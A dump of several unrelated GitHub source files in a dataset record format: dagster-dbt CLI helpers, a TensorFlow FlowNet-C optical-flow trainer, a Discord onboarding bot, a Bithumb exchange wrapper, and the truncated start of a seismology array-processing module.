default=False)\n\n class Meta:\n db_table = 'vinho'\n\n def __str__(self):\n return self.nome\n\n\n","repo_name":"eng-olavo/wine","sub_path":"core/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3672,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9892357917","text":"import json\nimport os\nimport subprocess\nfrom typing import Any, Iterator, List, Mapping, NamedTuple, Optional, Sequence, Union\n\nimport dagster._check as check\nfrom dagster._core.utils import coerce_valid_log_level\n\nfrom ..errors import (\n DagsterDbtCliFatalRuntimeError,\n DagsterDbtCliHandledRuntimeError,\n DagsterDbtCliOutputsNotFoundError,\n)\nfrom .types import DbtCliOutput\n\nDEFAULT_DBT_TARGET_PATH = \"target\"\n\nDBT_RUN_RESULTS_COMMANDS = [\"run\", \"test\", \"seed\", \"snapshot\", \"docs generate\", \"build\"]\n\n\nclass DbtCliEvent(NamedTuple):\n \"\"\"Helper class to encapsulate parsed information from an active dbt CLI process.\"\"\"\n\n line: Optional[str]\n message: Optional[str]\n parsed_json_line: Optional[Mapping[str, Any]]\n log_level: Optional[int]\n\n @classmethod\n def from_line(cls, line: str, json_log_format: bool) -> \"DbtCliEvent\":\n message = line\n parsed_json_line = None\n log_level = \"info\"\n\n # parse attributes out of json fields\n if json_log_format:\n try:\n parsed_json_line = json.loads(line)\n except json.JSONDecodeError:\n pass\n else:\n # in rare cases, the loaded json line may be a string rather than a dictionary\n if isinstance(parsed_json_line, dict):\n message = parsed_json_line.get(\n # Attempt to get the message from the dbt-core==1.3.* format\n \"msg\",\n # Otherwise, try to get the message from the dbt-core==1.4.* format\n parsed_json_line.get(\"info\", {}).get(\n \"msg\",\n # If all else fails, default to the whole line\n line,\n ),\n )\n log_level = parsed_json_line.get(\n # Attempt to get the log level from the dbt-core==1.3.* format\n \"level\",\n # Otherwise, try to get the message from the dbt-core==1.4.* format\n parsed_json_line.get(\"info\", {}).get(\n \"level\",\n # If all else fails, default to the `debug` level\n \"debug\",\n ),\n )\n # attempt to parse log level out of raw line\n elif \"Done.\" not in line:\n # attempt to parse a log level out of the line\n if \"ERROR\" in line:\n log_level = \"error\"\n elif \"WARN\" in line:\n log_level = \"warn\"\n\n return DbtCliEvent(\n line=line,\n message=message,\n parsed_json_line=parsed_json_line,\n log_level=coerce_valid_log_level(log_level),\n )\n\n\ndef _create_command_list(\n executable: str,\n warn_error: bool,\n json_log_format: bool,\n command: str,\n flags_dict: Mapping[str, Any],\n debug: bool,\n) -> Sequence[str]:\n prefix = [executable]\n if warn_error:\n prefix += [\"--warn-error\"]\n if json_log_format:\n prefix += [\"--no-use-colors\", \"--log-format\", \"json\"]\n if debug:\n prefix += [\"--debug\"]\n\n full_command = [*command.split(\" \"), *build_command_args_from_flags(flags_dict)]\n\n return prefix + full_command\n\n\ndef build_command_args_from_flags(flags_dict: Mapping[str, Any]) -> Sequence[str]:\n result = []\n for flag, value in flags_dict.items():\n if not value:\n continue\n\n result.append(f\"--{flag}\")\n\n if isinstance(value, bool):\n pass\n elif isinstance(value, list):\n check.list_param(value, f\"config.{flag}\", of_type=str)\n result += value\n elif isinstance(value, dict):\n result.append(json.dumps(value))\n else:\n result.append(str(value))\n\n return result\n\n\ndef _core_execute_cli(\n command_list: Sequence[str],\n ignore_handled_error: bool,\n json_log_format: bool,\n project_dir: str,\n) -> Iterator[Union[DbtCliEvent, int]]:\n \"\"\"Runs a dbt command in a subprocess and yields parsed output line by line.\"\"\"\n # Execute the dbt CLI command in a subprocess.\n messages: List[str] = []\n\n # run dbt with unbuffered output\n passenv = os.environ.copy()\n passenv[\"PYTHONUNBUFFERED\"] = \"1\"\n process = subprocess.Popen(\n command_list,\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n env=passenv,\n cwd=project_dir if os.path.exists(project_dir) else None,\n )\n for raw_line in process.stdout or []:\n line = raw_line.decode().strip()\n\n cli_event = DbtCliEvent.from_line(line, json_log_format)\n\n if cli_event.message is not None:\n messages.append(cli_event.message)\n\n # yield the parsed values\n yield cli_event\n\n process.wait()\n return_code = process.returncode\n\n if return_code == 2:\n raise DagsterDbtCliFatalRuntimeError(messages=messages)\n\n if return_code == 1 and not ignore_handled_error:\n raise DagsterDbtCliHandledRuntimeError(messages=messages)\n\n yield return_code\n\n\ndef execute_cli_stream(\n executable: str,\n command: str,\n flags_dict: Mapping[str, Any],\n log: Any,\n warn_error: bool,\n ignore_handled_error: bool,\n json_log_format: bool = True,\n capture_logs: bool = True,\n debug: bool = False,\n) -> Iterator[DbtCliEvent]:\n \"\"\"Executes a command on the dbt CLI in a subprocess.\"\"\"\n command_list = _create_command_list(\n executable=executable,\n warn_error=warn_error,\n json_log_format=json_log_format,\n command=command,\n flags_dict=flags_dict,\n debug=debug,\n )\n log.info(f\"Executing command: {' '.join(command_list)}\")\n\n for event in _core_execute_cli(\n command_list=command_list,\n json_log_format=json_log_format,\n ignore_handled_error=ignore_handled_error,\n project_dir=flags_dict[\"project-dir\"],\n ):\n if isinstance(event, int):\n return_code = event\n log.info(f\"dbt exited with return code {return_code}\")\n break\n\n yield event\n if capture_logs:\n log.log(event.log_level, event.message)\n\n\ndef execute_cli(\n executable: str,\n command: str,\n flags_dict: Mapping[str, Any],\n log: Any,\n warn_error: bool,\n ignore_handled_error: bool,\n target_path: str,\n docs_url: Optional[str] = None,\n json_log_format: bool = True,\n capture_logs: bool = True,\n debug: bool = False,\n) -> DbtCliOutput:\n \"\"\"Executes a command on the dbt CLI in a subprocess.\"\"\"\n check.str_param(executable, \"executable\")\n check.str_param(command, \"command\")\n check.mapping_param(flags_dict, \"flags_dict\", key_type=str)\n check.bool_param(warn_error, \"warn_error\")\n check.bool_param(ignore_handled_error, \"ignore_handled_error\")\n\n command_list = _create_command_list(\n executable=executable,\n warn_error=warn_error,\n json_log_format=json_log_format,\n command=command,\n flags_dict=flags_dict,\n debug=debug,\n )\n log.info(f\"Executing command: {' '.join(command_list)}\")\n\n return_code = 0\n lines, parsed_json_lines = [], []\n for event in _core_execute_cli(\n command_list=command_list,\n json_log_format=json_log_format,\n ignore_handled_error=ignore_handled_error,\n project_dir=flags_dict[\"project-dir\"],\n ):\n if isinstance(event, int):\n return_code = event\n log.info(f\"dbt exited with return code {return_code}\")\n break\n\n if event.line is not None:\n lines.append(event.line)\n if event.parsed_json_line is not None:\n parsed_json_lines.append(event.parsed_json_line)\n\n if capture_logs:\n log.log(event.log_level, event.message)\n\n run_results = (\n parse_run_results(flags_dict[\"project-dir\"], target_path)\n if command in DBT_RUN_RESULTS_COMMANDS\n else {}\n )\n\n return DbtCliOutput(\n command=\" \".join(command_list),\n return_code=return_code,\n raw_output=\"\\n\\n\".join(lines),\n logs=parsed_json_lines,\n result=run_results,\n docs_url=docs_url,\n )\n\n\ndef parse_run_results(path: str, target_path: str = DEFAULT_DBT_TARGET_PATH) -> Mapping[str, Any]:\n \"\"\"Parses the `target/run_results.json` artifact that is produced by a dbt process.\"\"\"\n run_results_path = os.path.join(path, target_path, \"run_results.json\")\n try:\n with open(run_results_path, encoding=\"utf8\") as file:\n return json.load(file)\n except FileNotFoundError:\n raise DagsterDbtCliOutputsNotFoundError(path=run_results_path)\n\n\ndef remove_run_results(path: str, target_path: str = DEFAULT_DBT_TARGET_PATH):\n \"\"\"Parses the `target/run_results.json` artifact that is produced by a dbt process.\"\"\"\n run_results_path = os.path.join(path, target_path, \"run_results.json\")\n if os.path.exists(run_results_path):\n os.remove(run_results_path)\n\n\ndef parse_manifest(path: str, target_path: str = DEFAULT_DBT_TARGET_PATH) -> Mapping[str, Any]:\n \"\"\"Parses the `target/manifest.json` artifact that is produced by a dbt process.\"\"\"\n manifest_path = os.path.join(path, target_path, \"manifest.json\")\n try:\n with open(manifest_path, encoding=\"utf8\") as file:\n return json.load(file)\n except FileNotFoundError:\n raise DagsterDbtCliOutputsNotFoundError(path=manifest_path)\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/libraries/dagster-dbt/dagster_dbt/core/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9542,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"18138310815","text":"import tensorflow as tf\nimport argparse\nimport yaml\nfrom tensorflow.python.ops.init_ops import Initializer\nimport numpy as np\nfrom tools.DataInputCylindrical import predict_input_fn, input_fn\nfrom hooks.Hooks import SaveTrainableParamsCount\nfrom tools.PlotDirectionalField import directionalFieldTF\nfrom flownet_ops.op_correlation import correlation\n\n\nclass LoadInitializer(Initializer):\n\n def __init__(self, dtype=tf.float32, name=''):\n self.dtype = tf.as_dtype(dtype)\n self.filename = '/home/klein/U/extracted_weights/flownet_c/' + name + '.npy'\n\n def __call__(self, shape, dtype=None, partition_info=None):\n if dtype is None:\n dtype = self.dtype\n\n data = np.load(self.filename)\n tensor = tf.reshape(tf.convert_to_tensor(data, dtype=dtype), shape)\n\n return tensor\n\n def get_config(self):\n return {\"dtype\": self.dtype.name}\n \n\ndef conv(a, filters, name, kernel_size=1, strides=1, activation=None, fr=False, reuse=None):\n if activation is None: activation = tf.nn.leaky_relu\n if fr:\n return tf.layers.conv2d(a, filters=filters, kernel_size=kernel_size, strides=strides, padding='same', name=name, activation=activation, reuse=reuse, kernel_initializer=LoadInitializer(name=name+'_weights'), bias_initializer=LoadInitializer(name=name+'_biases'))\n else:\n return tf.layers.conv2d(a, filters=filters, kernel_size=kernel_size, strides=strides, padding='same', name=name, activation=activation, reuse=reuse)\n\n\ndef deconv(a, filters, name=None, kernel_size=1, strides=1, activation=None, fr=False):\n if activation is None: activation = tf.nn.leaky_relu\n if fr:\n return tf.layers.conv2d_transpose(a, filters=filters, kernel_size=kernel_size, strides=strides, padding='same', name=name, activation=activation, kernel_initializer=LoadInitializer(name=name+'_weights'), bias_initializer=LoadInitializer(name=name+'_biases'))\n else:\n return tf.layers.conv2d_transpose(a, filters=filters, kernel_size=kernel_size, strides=strides, padding='same', name=name, activation=activation)\n\n\ndef model_fn(features, labels, mode, params):\n firstrun = params['FIRSTRUN']\n\n # resizing:\n features = tf.image.resize_images(features, [64, 1024])\n if mode != tf.estimator.ModeKeys.PREDICT:\n labels = tf.image.resize_images(labels, [64, 1024])\n\n labels = labels[:,:,:,0:2]\n\n image_a = features[:,:,:,0:3]\n image_b = features[:,:,:,3:6]\n\n conv_a_1 = conv(image_a, filters=64, kernel_size=7, strides=2, fr=firstrun, name='conv1')\n conv_a_2 = conv(conv_a_1, filters=128, kernel_size=5, strides=2, fr=firstrun, name='conv2')\n conv_a_3 = conv(conv_a_2, filters=256, kernel_size=5, strides=2, fr=firstrun, name='conv3')\n\n conv_b_1 = conv(image_b, filters=64, kernel_size=7, strides=2, fr=firstrun, name='conv1', activation=tf.nn.relu, reuse=True)\n conv_b_2 = conv(conv_b_1, filters=128, kernel_size=5, strides=2, fr=firstrun, name='conv2', activation=tf.nn.relu, reuse=True)\n conv_b_3 = conv(conv_b_2, filters=256, kernel_size=5, strides=2, fr=firstrun, name='conv3', activation=tf.nn.relu, reuse=True)\n\n cc = correlation(conv_a_3, conv_b_3, 1, 20, 1, 2, 20)\n cc_relu = tf.nn.relu(cc)\n netA_conv = conv(conv_a_3, filters=32, kernel_size=1, fr=firstrun, name='conv_redir')\n net = tf.concat([netA_conv, cc_relu], axis=3)\n\n conv3_1 = conv(net, filters=256, kernel_size=3, strides=1, fr=firstrun, name='conv3_1')\n\n conv4 = conv(conv3_1, filters=512, kernel_size=3, strides=2, fr=firstrun, name='conv4')\n conv4_1 = conv(conv4, filters=512, kernel_size=3, strides=1, fr=firstrun, name='conv4_1')\n\n conv5 = conv(conv4_1, filters=512, kernel_size=3, strides=2, fr=firstrun, name='conv5')\n conv5_1 = conv(conv5, filters=512, kernel_size=3, strides=1, fr=firstrun, name='conv5_1')\n\n conv6 = conv(conv5_1, filters=1024, kernel_size=3, strides=2, fr=firstrun, name='conv6')\n conv6_1 = conv(conv6, filters=1024, kernel_size=3, strides=1, fr=firstrun, name='conv6_1')\n\n # refinement\n predict_6 = conv(conv6_1, filters=2, kernel_size=3, fr=firstrun, name='predict_flow6')\n deconv5 = deconv(conv6_1, filters=512, kernel_size=4, strides=2, fr=firstrun, name='deconv5')\n upsample_6to5 = deconv(predict_6, filters=2, kernel_size=4, strides=2, activation=None, fr=firstrun, name='upsample_flow6to5')\n concat5 = tf.concat([conv5_1, deconv5, upsample_6to5], axis=3, name='concat_1')\n\n predict_5 = conv(concat5, filters=2, kernel_size=3, fr=firstrun, name='predict_flow5')\n deconv4 = deconv(concat5, filters=256, kernel_size=4, strides=2, fr=firstrun, name='deconv4')\n upsample_5to4 = deconv(predict_5, filters=2, kernel_size=4, strides=2, activation=None, fr=firstrun, name='upsample_flow5to4')\n concat4 = tf.concat([conv4_1, deconv4, upsample_5to4], axis=3, name='concat_2')\n\n predict_4 = conv(concat4, filters=2, kernel_size=3, fr=firstrun, name='predict_flow4')\n deconv3 = deconv(concat4, filters=128, kernel_size=4, strides=2, fr=firstrun, name='deconv3')\n upsample_4to3 = deconv(predict_4, filters=2, kernel_size=4, strides=2, activation=None, fr=firstrun, name='upsample_flow4to3')\n concat3 = tf.concat([conv3_1, deconv3, upsample_4to3], axis=3, name='concat_3')\n\n predict_3 = conv(concat3, filters=2, kernel_size=3, fr=firstrun, name='predict_flow3')\n deconv2 = deconv(concat3, filters=64, kernel_size=4, strides=2, fr=firstrun, name='deconv2')\n upsample_3to2 = deconv(predict_3, filters=2, kernel_size=4, strides=2, activation=None, fr=firstrun, name='upsample_flow3to2')\n concat2 = tf.concat([conv_a_2, deconv2, upsample_3to2], axis=3, name='concat_4')\n\n predict_2 = conv(concat2, filters=2, kernel_size=3, fr=firstrun, name='predict_flow2') # no pretrained weights available because we want 3d-flow\n\n x = predict_2 * 20.0\n x = tf.image.resize_bilinear(x, [64, 1024], align_corners=True)\n\n # for prediction only:\n if mode == tf.estimator.ModeKeys.PREDICT:\n return tf.estimator.EstimatorSpec(\n mode=mode,\n predictions={\"predictions\": x})\n\n labels = labels * 0.05\n\n if params['LOSS'] == 'special':\n losses = []\n\n # L2 loss between predict_flow6, blob23 (weighted w/ 0.32)\n size = [predict_6.shape[1], predict_6.shape[2]]\n downsampled_flow6 = tf.image.resize_bilinear(labels, size)\n losses.append(tf.losses.mean_squared_error(downsampled_flow6, predict_6))\n\n # L2 loss between predict_flow5, blob28 (weighted w/ 0.08)\n size = [predict_5.shape[1], predict_5.shape[2]]\n downsampled_flow5 = tf.image.resize_bilinear(labels, size)\n losses.append(tf.losses.mean_squared_error(downsampled_flow5, predict_5))\n\n # L2 loss between predict_flow4, blob33 (weighted w/ 0.02)\n size = [predict_4.shape[1], predict_4.shape[2]]\n downsampled_flow4 = tf.image.resize_bilinear(labels, size)\n losses.append(tf.losses.mean_squared_error(downsampled_flow4, predict_4))\n\n # L2 loss between predict_flow3, blob38 (weighted w/ 0.01)\n size = [predict_3.shape[1], predict_3.shape[2]]\n downsampled_flow3 = tf.image.resize_bilinear(labels, size)\n losses.append(tf.losses.mean_squared_error(downsampled_flow3, predict_3))\n\n # L2 loss between predict_flow2, blob43 (weighted w/ 0.005)\n size = [predict_2.shape[1], predict_2.shape[2]]\n downsampled_flow2 = tf.image.resize_bilinear(labels, size)\n losses.append(tf.losses.mean_squared_error(downsampled_flow2, predict_2))\n\n loss = tf.losses.compute_weighted_loss(losses, [0.32, 0.08, 0.02, 0.01, 0.005])\n else :\n # calculate loss:\n mask = tf.stack([features[:, :, :, 0], features[:, :, :, 0]], axis=3)\n weight_matrix = tf.where(tf.abs(mask) < 0.001, tf.ones_like(mask), tf.ones_like(mask)*params['LOSS_WEIGHT_OCCUPIED'])\n\n loss = tf.losses.mean_squared_error(labels, x, weight_matrix)\n\n # output end point error as evaluation metric\n firstlayer = labels[:, :, :, 0]\n bool_mask = tf.layers.flatten(tf.where(tf.abs(firstlayer) < 0.01, tf.zeros_like(firstlayer, dtype=tf.bool), tf.ones_like(firstlayer, dtype=tf.bool)))\n epe = tf.reduce_mean(tf.boolean_mask(tf.layers.flatten(tf.norm(labels - x, ord='euclidean', axis=3)), bool_mask))\n tf.summary.scalar('epe', epe)\n\n overall_epe = tf.reduce_mean(tf.norm(labels - x, ord='euclidean', axis=3))\n tf.summary.scalar('overall_epe', overall_epe)\n\n # image output\n tf.summary.image('output', tf.expand_dims(directionalFieldTF(x[0,:,:,0],x[0,:,:,1],1.8),0))\n tf.summary.image('groundtruth', tf.expand_dims(directionalFieldTF(20.0*labels[0,:,:,0],20.0*labels[0,:,:,1],1.8),0))\n\n # metrics for evaluation\n eval_metrics = {\n 'epe':tf.metrics.mean_absolute_error(0.0, epe)\n }\n\n # solver\n global_step = tf.train.get_global_step()\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n with tf.control_dependencies(update_ops):\n optimizer = tf.train.AdamOptimizer(learning_rate=params['LEARNING_RATE'])\n train_op = optimizer.minimize(loss=loss, global_step=global_step)\n\n return tf.estimator.EstimatorSpec(\n mode=mode,\n loss=loss,\n train_op=train_op,\n eval_metric_ops=eval_metrics)\n\n\ndef main(args):\n import os\n\n # load config file:\n with open(args.parameters, 'r') as stream:\n try:\n cfg = yaml.load(stream)\n except yaml.YAMLError as exc:\n print(exc)\n return\n\n gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=cfg['GPU_FRACTION'])\n session_config = tf.ConfigProto(gpu_options=gpu_options)\n config = tf.estimator.RunConfig()\n config = config.replace(session_config=session_config)\n config = config.replace(model_dir=cfg['MODEL_DIR'])\n config = config.replace(save_summary_steps=cfg['SUMMARY_STEPS'])\n config = config.replace(save_checkpoints_secs=cfg['CHECKPOINTS_SECS'])\n\n if os.path.exists(cfg['MODEL_DIR']):\n cfg.update({'FIRSTRUN': False})\n else:\n cfg.update({'FIRSTRUN': True})\n\n nn = tf.estimator.Estimator(model_fn=model_fn, params=cfg, config=config)\n\n if not args.inference:\n # first run to load pretrained weights\n if cfg['FIRSTRUN']:\n nn.train(input_fn=lambda: input_fn(cfg['BATCH_SIZE'], cfg['TRAIN_DATA_LOCATION']),\n hooks=[SaveTrainableParamsCount(cfg['MODEL_DIR'])], steps=1)\n\n cfg.update({'FIRSTRUN': False})\n nn = tf.estimator.Estimator(model_fn=model_fn, params=cfg, config=config)\n\n for x in range(cfg['NUM_EPOCHS']):\n nn.train(input_fn=lambda:input_fn(cfg['BATCH_SIZE'], cfg['TRAIN_DATA_LOCATION']))\n nn.evaluate(input_fn=lambda:input_fn(cfg['BATCH_SIZE'], cfg['EVAL_DATA_LOCATION']), steps=int(cfg['EVAL_EXAMPLES']/cfg['BATCH_SIZE']))\n else:\n import os\n\n if args.output != '':\n if not os.path.exists(args.output):\n os.makedirs(args.output)\n\n with open(cfg['EVAL_DATA_LOCATION'], 'r') as f:\n slice_data = [line.strip() for line in f]\n\n predictions = nn.predict(input_fn=lambda: predict_input_fn(slice_data))\n for i,p in enumerate(predictions):\n prediction = p['predictions']\n data = slice_data[i].split(',')\n if args.output == '':\n print(prediction)\n input()\n else:\n # write to output dir:\n print('Writing estimation',i+1,'of',len(slice_data))\n np.save(args.output + '/' + str(i).zfill(3) + '_estimation', np.array(prediction))\n\n return\n\n\nif __name__ == \"__main__\":\n tf.logging.set_verbosity(tf.logging.INFO)\n\n parser = argparse.ArgumentParser(description='Neural Network')\n parser.add_argument('-p', '--parameters', help='Yaml parameter file to be used')\n parser.add_argument('-i', '--inference', help='Set this for prediciton, omit for learning.', action='store_true')\n parser.add_argument('-o', '--output', help='If set, this is the output folder for prediction.', default='')\n\n main(parser.parse_args())\n","repo_name":"zhangqiuhao/Unsupervised_flow","sub_path":"Python/FlowNet/FlowNet_C_2D.py","file_name":"FlowNet_C_2D.py","file_ext":"py","file_size_in_byte":12142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34908534820","text":"import os\nfrom dotenv import load_dotenv\n\nimport asyncio\n\nimport dhooks_lite\n\nimport lightbulb\nfrom hikari import Intents, Embed, events, errors\n\n\nload_dotenv()\n\nif os.name != \"nt\":\n import uvloop\n uvloop.install()\n\nbot = lightbulb.Bot(\n token=os.getenv(\"DISCORD_BOT_TOKEN\"),\n prefix=\"^\",\n intents=Intents.ALL,\n logs={\n \"version\": 1,\n \"incremental\": True,\n \"loggers\": {\n \"hikari\": {\"level\": \"INFO\"},\n \"hikari.ratelimits\": {\"level\": \"TRACE_HIKARI\"},\n \"lightbulb\": {\"level\": \"INFO\"},\n }\n }\n)\n\n\n@bot.command()\nasync def ping(ctx):\n await ctx.respond(\"Pong!\")\n\n\nclass WelcomePlugin(lightbulb.Plugin):\n\n def __init__(self, bot):\n super().__init__()\n self.bot = bot\n self.log_channel_hook = dhooks_lite.Webhook(os.getenv(\"LOG_CHANNEL_WEBHOOK_LINK\"))\n self.questions = [\n {\n \"title\": \"How would you like to be addressed?\",\n \"sub\": \"What name(s) and pronouns would you like us to use?\",\n \"type\": \"text\"\n },\n {\n \"title\": \"Why did you come to the TEC?\",\n \"options\": [\n \"[Curious] - I’m curious to learn more about TEC in general\",\n \"[Future Contributor] - I’d like to contribute to building or improving the TEC\",\n \"[Proposals] - I’d like to submit a proposal in order to receive TEC funding\",\n \"[Partnerships] - I want to build a partnership between my DAO and the TEC\",\n \"[Education] - I want to learn more about Web3, DAOs, and/or Token Engineering\",\n \"[Other] - [Long Answer Text Box]\"\n ],\n \"emojis\": [\n '🤔',\n '🛠️',\n '📜',\n '🤝',\n '📚',\n '➕'\n ],\n \"type\": \"choice\"\n },\n {\n \"title\": \"How familiar are you with web3?\",\n \"type\": \"text\"\n },\n {\n \"title\": \"How did you find out about the TEC?\",\n \"type\": \"text\"\n },\n {\n \"title\": \"Which timezone are you in?\",\n \"type\": \"text\"\n }\n ]\n\n async def form_runner(self, member):\n try:\n details = []\n\n for ques in self.questions:\n if ques['type'] == 'text':\n await member.send(\n Embed(\n title=ques['title'],\n description=ques['sub'] if 'sub' in ques else None,\n color=0xdefb48\n )\n )\n response = await self.bot.wait_for(\n events.DMMessageCreateEvent,\n 180.0,\n lambda event: event.author.id == member.id\n )\n details.append(response.message.content)\n elif ques['type'] == 'choice':\n msg = await member.send(\n Embed(\n title=ques['title'],\n description=\"React with an emoji to make your choice for this question:\\n\\n\" + '\\n'.join([f\"{ques['emojis'][i]} {ques['options'][i]}\" for i in range(len(ques['options']))]),\n color=0xdefb48\n )\n )\n\n for emoji in ques['emojis']:\n await msg.add_reaction(emoji)\n\n content = \"\"\n\n try:\n reaction = await self.bot.wait_for(\n events.DMReactionAddEvent,\n 180.0,\n lambda event: (event.user_id == member.id) and (event.emoji_name in ques['emojis'])\n )\n content += [ques[\"options\"][i] for i in range(len(ques['options'])) if ques['emojis'][i] == reaction.emoji_name][0]\n if reaction.emoji_name == emoji[-1]:\n await member.send(Embed(description=\"You can enter a more detailed description in a message below...\"))\n response = await self.bot.wait_for(\n events.DMMessageCreateEvent,\n 180.0,\n lambda event: event.author_id == member.id\n )\n content += f'\\n{response.message.content}'\n\n details.append(content)\n except asyncio.TimeoutError:\n for emoji in ques['emojis']:\n await msg.remove_reaction(\n emoji,\n user=self.bot.get_me()\n )\n\n else:\n await member.send(\"Something's wrong... Oh no!\")\n\n\n def get_field(i):\n title = self.questions[i].get('title')\n sub = self.questions[i].get('sub')\n\n title = '' if not title else title\n sub = '' if not sub else sub\n return f\"**{title + ' - ' + sub}**\\n{details[i]}\"\n\n self.log_channel_hook.execute(\n embeds=[dhooks_lite.Embed(\n title=f\"{member} joined the server!\",\n description=\"\\n\\n\".join(\n [f\"{get_field(i)}\" for i in range(len(details))]\n ),\n color=0xdefb48\n )]\n )\n\n\n await member.send(\n Embed(\n description=\"Thanks for filling out this form! To continue your journey, visit the #your-guide channel...\",\n color=0x00ff00\n )\n )\n\n except asyncio.TimeoutError:\n await member.send(\n Embed(\n description=\"That form timed out, to fill the same, use the command- `^welcome` and follow the instructions.\",\n color=0xff0000\n )\n )\n\n\n\n async def greeting(self, member):\n try:\n msg = await member.send(\n Embed(\n title=\"Welcome to the TEC!\",\n description=\"It would be great if you could share some more info with us by filling a small form. To start filling it react to this mesage with a 📝\",\n color=0xdefb48\n )\n )\n await msg.add_reaction('📝')\n\n try:\n reaction = await self.bot.wait_for(\n events.DMReactionAddEvent,\n 180.0,\n lambda event: event.user_id == member.id\n )\n await self.form_runner(member)\n except asyncio.TimeoutError:\n await msg.remove_reaction(\n '📝',\n user=self.bot.get_me()\n )\n await member.send(\n Embed(\n description=\"That form timed out, to fill the same, use the command- `^welcome` and follow the instructions.\",\n color=0xff0000\n )\n )\n except errors.ForbiddenError:\n await self.log_channel_hook.execute(\n embeds=[Embed(\n description=f\"Error: Couldn't send DM to {member.mention}\",\n color=0xff0000\n )]\n )\n\n @lightbulb.dm_only()\n @lightbulb.command()\n async def welcome(self, ctx):\n await self.greeting(ctx.author)\n\n @lightbulb.plugins.listener(events.MemberCreateEvent)\n async def send_greetings(self, event):\n try:\n print(f\"{event.member} entered the server...\")\n \"\"\"\n self.add_data(\n str(event.member.id),\n event.member.username + '#' + event.member.discriminator\n )\n \"\"\"\n except Exception as e:\n await event.member.send(f\"Error -\\n{e}\")\n print(e)\n await self.greeting(event.member)\n\n\nbot.add_plugin(WelcomePlugin(bot))\nbot.run()\n","repo_name":"Vyvy-vi/TEC-welcome-bot","sub_path":"bot/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41348870952","text":"import logging\nfrom exchange.errors import *\nfrom exchange.ticker import Ticker\nfrom exchange.orderbook import *\nfrom exchange.currency_pair import CurrencyPair\nfrom exchange.exchange_base import ExchangeBase\nfrom exchange.bithumb.bithumb import Bithumb\n\n\nclass ExchangeBithumb(ExchangeBase):\n \"\"\"\n Bithumb\n \"\"\"\n NAME = 'Bithumb'\n VERSION = 'Unknown'\n URL = 'https://www.bithumb.com/u1/US127'\n\n def __init__(self):\n super().__init__(self.NAME, self.VERSION, self.URL)\n self.bithumb = Bithumb()\n\n def get_currency_pairs(self):\n '''\n Gets currency list supported by exchange\n :return: supported currency pair list\n :rtype: CurrencyPair[]\n '''\n currency_pairs = []\n ticker_all = self.bithumb.ticker('ALL')\n if int(ticker_all['status']) != 0:\n raise Exception('ticker() failed(%s)' % ticker_all['status'])\n for key in ticker_all['data'].keys():\n if key == 'date':\n continue\n currency_pairs.append(CurrencyPair(\"KRW\", key.upper()))\n return currency_pairs\n\n def get_ticker(self, currency_pair):\n '''\n Gets last price\n :param CurrencyPair currency_pair: currency pair\n :return: ticker\n :rtype: Ticker\n '''\n if currency_pair is None:\n raise InvalidParamException('currency_pair is None')\n if currency_pair.market_currency != 'KRW':\n raise InvalidParamException('invalid market_currency')\n ticker = self.bithumb.ticker(currency_pair.currency)\n if int(ticker['status']) != 0:\n raise Exception('ticker() failed(%s)' % ticker['status'])\n price = float(ticker['data']['closing_price'])\n timestamp = int(ticker['data']['date'])\n return Ticker(currency_pair, price, timestamp)\n\n def get_orderbook(self, currency_pair):\n '''\n Gets orderbook information\n :param CurrencyPair currency_pair: currency pair\n :return: orderbook\n :rtype: Orderbook\n '''\n if currency_pair is None:\n raise InvalidParamException('currency_pair is None')\n if currency_pair.market_currency != 'KRW':\n raise InvalidParamException('invalid market_currency')\n orderbook = self.bithumb.orderbook(currency_pair.currency)\n if int(orderbook['status']) != 0:\n raise Exception('orderbook() failed(%s)' % orderbook['status'])\n\n timestamp = orderbook['data']['timestamp']\n asks = []\n for unit in orderbook['data']['asks']:\n price = float(unit['price'])\n amount = float(unit['quantity'])\n asks.append(OrderbookItem(price, amount))\n\n bids = []\n for unit in orderbook['data']['bids']:\n price = float(unit['price'])\n amount = float(unit['quantity'])\n bids.append(OrderbookItem(price, amount))\n\n return Orderbook(currency_pair, asks, bids, timestamp)\n","repo_name":"inasie/pyexchange","sub_path":"exchange/bithumb/exchange_bithumb.py","file_name":"exchange_bithumb.py","file_ext":"py","file_size_in_byte":2988,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"75115491687","text":"import os\nimport sys\nimport math\nfrom math import radians, cos, sin, atan2\nimport logging\nfrom obspy.core.utcdatetime import UTCDateTime\nfrom palantiri.common import Basic, Globals, Logfile, DataTypes\nfrom palantiri.common.DataTypes import Location\nfrom palantiri.common.ObspyFkt import loc2degrees\nfrom palantiri.common.ConfigFile import ConfigObj, OriginCfg, SynthCfg\nimport time\nimport numpy as num\nfrom collections import OrderedDict, defaultdict\nfrom pyrocko.gf import ws, LocalEngine, Target, DCSource, RectangularSource\nfrom pyrocko import util, pile, model, catalog, gf, cake, io, trace\nfrom pyrocko.guts import Object, String, Float, List\nfrom palantiri.process.semp import otest\nfrom palantiri.process.beam_stack import BeamForming\nfrom pyrocko.gf import STF\nfrom palantiri.process.stacking import PWS_stack\nfrom palantiri.process import sembCalc\nfrom palantiri.process import ttt, waveform, sembCalc, trigger\nfrom palantiri.tools import config\nfrom palantiri.process.array_crosscorrelation_v4 import Xcorr, cmpFilterMetavsXCORR, getArrayShiftValue\nimport cPickle as pickle\nimport times\n\nkm = 1000.\n\n\nlogger = logging.getLogger('ARRAY-MP')\n\n\nclass CombiSource(gf.Source):\n '''Composite source model.'''\n\n discretized_source_class = gf.DiscretizedMTSource\n\n subsources = List.T(gf.Source.T())\n\n def __init__(self, subsources=[], **kwargs):\n if subsources:\n\n lats = num.array(\n [subsource.lat for subsource in subsources], dtype=num.float)\n lons = num.array(\n [subsource.lon for subsource in subsources], 